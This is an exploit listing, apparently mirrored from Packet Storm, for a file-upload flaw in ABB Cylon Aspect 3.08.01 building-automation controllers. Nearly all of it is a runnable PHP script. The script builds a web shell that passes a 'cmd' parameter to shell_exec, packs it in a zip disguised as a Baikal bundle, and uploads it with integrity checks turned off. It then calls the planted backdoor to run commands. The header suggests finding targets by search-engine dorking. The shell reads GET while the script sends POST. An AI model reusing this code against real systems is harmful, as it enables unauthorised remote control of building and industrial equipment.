Share
## https://sploitus.com/exploit?id=PACKETSTORM:189685
=============================================================================================================================================
    | # Title     : ABB Cylon Aspect 3.08.01 shell upload                                                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://global.abb/group/en                                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Script to exploit file upload vulnerability in ABB Cylon Aspect 3.08.01 Allows you to upload a PHP file and execute it on the target server.
    
        (Related : https://packetstorm.news/files/id/189617/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    // سكربت لاستغلال ثغرة رفع الملفات في ABB Cylon Aspect 3.08.01
    // يسمح برفع ملف PHP وتنفيذه على السيرفر المستهدف
    
    $target_url = "http://192.168.73.31/caldavUpload.php";
    $backdoor_path = "baikal/html/indoushka.php";
    $zip_file = "baikal-0.6.1.zip";
    
    // إنشاء باك دور بسيط
    $backdoor = "<?php echo shell_exec(\$_GET['cmd']); ?>";
    file_put_contents("indoushka.php", $backdoor);
    
    // ضغط الباك دور في ملف ZIP
    $zip = new ZipArchive();
    if ($zip->open($zip_file, ZipArchive::CREATE) === TRUE) {
        $zip->addFile("indoushka.php", $backdoor_path);
        $zip->close();
        echo "[+] تم إنشاء ملف ZIP يحتوي على الباك دور.\n";
    } else {
        die("[-] فشل في إنشاء ملف ZIP.\n");
    }
    
    // رفع الملف إلى السيرفر
    $post_data = [
        'baikalFile' => new CURLFile($zip_file),
        'skipChecksum' => '1',
        'EXPERTMODE' => '1'
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (strpos($response, "Baikal Bundle Uploaded and Extracted - OK") !== false) {
        echo "[+] تم رفع الباك دور بنجاح!\n";
    } else {
        die("[-] فشل في رفع الباك دور.\n");
    }
    
    // تنفيذ أوامر من خلال الباك دور
    $backdoor_url = "http://192.168.73.31/baikal/html/indoushka.php";
    $cmd = "id";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $backdoor_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, ['cmd' => $cmd]);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    
    echo "[+] استجابة الباك دور:\n$response\n";
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================